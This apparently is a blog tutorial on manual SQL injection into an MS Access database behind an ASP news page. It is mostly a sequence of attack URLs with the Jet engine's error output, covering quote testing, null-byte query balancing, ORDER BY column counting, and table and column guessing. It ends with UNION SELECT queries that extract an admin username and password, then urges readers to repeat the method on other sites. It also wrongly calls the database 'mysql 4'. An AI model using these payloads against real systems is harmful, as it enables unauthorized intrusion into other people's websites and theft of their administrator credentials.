Social Icons

Monday 20 July 2015

MS-Access Injection -Tutorial

MS-Access Injection -Tutorial
In this Tutorial You Will learn How to inject into MS Access Database.
So we will start Our Injecting Manually.First we have to check if Our Target site is Vulnerable .So we will use Regular injecting Type and add Single Quote ' at the end of the Parameter.

and Execute the URL

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341'
Here we got The ERROR ! !
MS-Access Injection -Tutorial
ERROR:
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'ID =341''.
/dettaglio-news.asp, line 91
So Our Target is Vulnerable.Before Starting Other Process first we have To balance our query.We will use Different Comments for balancing Our Query.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341--+ Error !

ERROR:Syntax error (missing operator) in query expression 'ID =341--'.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341-- Again Error !!

Now Let's Check the null-byte " ;% 00 "
http://www.Vuln-Site.com/dettaglio-news.asp?ID=341;% 00 Error  Gone!!
so will continue our Injecting With using Null-Byte at the end of the Parameter.

Now we have to Count the Total number of Columns .So For This Purpose we will use Normally ORDER BY command.
Let's Check Total Number of Columns:
http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 1;% 00
No Error. Page Loaded Normally !

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 5;% 00
Again No Error !

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 8;% 00
Again page Loaded Normally !

but at order by 9 we have got the ERROR !
http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 9;% 00
MS-Access Injection -Tutorial
ERROR:
Microsoft JET Database Engine error '80040e14'
The Microsoft Jet database engine does not recognize '9' as a valid field name or expression.
/dettaglio-news.asp, line 91
So There are 8 Columns .
Now Let's Prepare our UNION BASED command.
After Executing The UNION BASED query We have Got ERROR:
http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8;% 00


MS-Access Injection -Tutorial

 ERROR:
Microsoft JET Database Engine error '80004005'
Query input must contain at least one table or query.
/dettaglio-news.asp, line 91
Here Comes The Main part.As our columns count is correct.so it seems to be Database is mysql 4. 
Now we Have to Guess the Tables and Columns.So First we will Guess the Tables.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from Login;% 00
it gives us ERROR!
MS-Access Injection -Tutorial
 ERROR:
Microsoft JET Database Engine error '80040e37'
The Microsoft Jet database engine cannot find the input table or query 'login'. Make sure it exists and that its name is spelled correctly.
/dettaglio-news.asp, line 91
it Mean this table is not Exist.Let's Try another.
http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from tabladmin;% 00
Still The Same ERROR!!
But when we try Table ADMIN the Error is Gone.
http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from admin;% 00
At the Table ADMIN the Error is gone and we can see the Vulnerable Columns on the Web Page .
MS-Access Injection -Tutorial


You can see the 2,3,6 are the Vulnerable Columns.so now we have to Guess The Columns.We will put our columns in these Vulnerable Columns.
http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,admin_id,4,5,6,7,8 from admin;% 00
It Gives us Error !


MS-Access Injection -Tutorial
ERROR:
Microsoft JET Database Engine error '80040e10'
No value given for one or more required parameters.
/dettaglio-news.asp, line 91
it Meas this Column is not exist. Let's Try Another.
http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,login_id,4,5,6,7,8 from admin;% 00
Still The Same Error !

When we Put  Username Column the Error is Gone.
http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,username,4,5,6,7,8 from admin;% 00


MS-Access Injection -Tutorial

So it gives us Username:01775IO5
Now Let's Guess column of Admin Password.
  
And the Column Password is also exist there.
http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,password,4,5,6,7,8 from admin;% 00
MS-Access Injection -Tutorial
it Gives us Password="bEx0Th6
So we will do the same for other sites to injecting into database.
Happy Injecting !!
AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee

2 comments: